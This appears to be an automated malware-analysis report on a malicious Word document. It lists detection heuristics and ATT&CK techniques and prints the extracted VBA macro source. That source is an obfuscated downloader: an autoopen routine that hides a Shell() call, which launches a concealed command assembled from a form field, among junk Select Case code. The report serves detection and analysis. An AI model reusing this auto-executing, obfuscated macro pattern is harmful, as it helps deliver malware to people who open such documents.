MALICIOUS
250
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and utilizes a 'Shell()' call, indicating an attempt to execute external commands. This is further supported by the 'SC_STR_CMD' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The primary IOC is the VBA macro file itself, which orchestrates the malicious execution.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-6790262-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6790262-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
End Select w442033210 = Array(U74168, l327164, w32741, Interaction.Shell(CVar("" + F97349984 + T727823 + F735426 + T60320451 + B4399186 + N511476276586.TextBox1) + v26841 + j6039134 + u39168045 + o18947100, 23 - 23), s123878) Select Case w9052468710557176 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() Q940909699 -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5291 bytes |
SHA-256: f90231113be2c529d531e7ebef8c1feb3e3821eba69d2f8301730615b15578d0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "N511476276586"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
Q940909699
End Sub
Attribute VB_Name = "H005373101410"
Function Q940909699()
On Error Resume Next
Select Case M809069905455878377270891
Case 240883173
h7762 = U2194
z213 = CInt(N0349 / CByte(J5494))
w283 = M2403
Case 258638999
j799 = l068
i1538 = V2891
C8621 = CInt(v9903 / CByte(n394))
Case 30589623
t8606 = r6530
Y9186 = O371
End Select
Select Case G436688716295627080083694
Case 20970485
M0850 = N4061
u6124 = CInt(i6680 / CByte(X452))
t4359 = m313
Case 76258916
K310 = A571
v754 = w717
E612 = CInt(J1140 / CByte(h544))
Case 184094862
M4315 = i5605
n717 = H729
End Select
Select Case C2322732186771235471
Case 212926280
v9339 = v4569
q7187 = CInt(O9336 / CByte(O9192))
q9943 = u097
Case 92805054
O0823 = H770
o4734 = z6137
A7558 = CInt(n0766 / CByte(f2277))
Case 234950648
F912 = d1609
J673 = b8149
End Select
Select Case r054825412401741406647
Case 57272088
s766 = j219
C251 = CInt(z1977 / CByte(a7502))
a654 = m351
Case 207244861
w5141 = c2634
Z6065 = w273
j559 = CInt(X3764 / CByte(r374))
Case 156210951
s8622 = z943
G2548 = V062
End Select
w442033210 = Array(U74168, l327164, w32741, Interaction.Shell(CVar("" + F97349984 + T727823 + F735426 + T60320451 + B4399186 + N511476276586.TextBox1) + v26841 + j6039134 + u39168045 + o18947100, 23 - 23), s123878)
Select Case w9052468710557176
Case 135977553
f185 = I6284
d658 = CInt(E3464 / CByte(k1981))
L873 = q9224
Case 65451356
i394 = Y5178
X3987 = j601
v0899 = CInt(d7781 / CByte(w124))
Case 169394394
U145 = K0013
a9321 = w687
End Select
Select Case w1425596027819460
Case 285919674
B819 = q917
A411 = CInt(D3479 / CByte(s608))
M997 = N2375
Case 320079340
F464 = J086
W9134 = w2321
i130 = CInt(m3952 / CByte(E344))
Case 300834575
T0086 = z750
M539 = C862
End Select
End Function
Attribute VB_Name = "Y73470006"
Attribute VB_Name = "q21417344827"
Attribute VB_Name = "P0379840861314"
Attribute VB_Name = "z6205818700"
Attribute VB_Name = "U40354184"
Attribute VB_Name = "N946386089"
Attribute VB_Name = "Z14605009484"
Attribute VB_Name = "f06879876555051"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "i953292349"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F04280021288592"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "z6916946"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F5630385523"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "A2252893783"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "m962170598"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.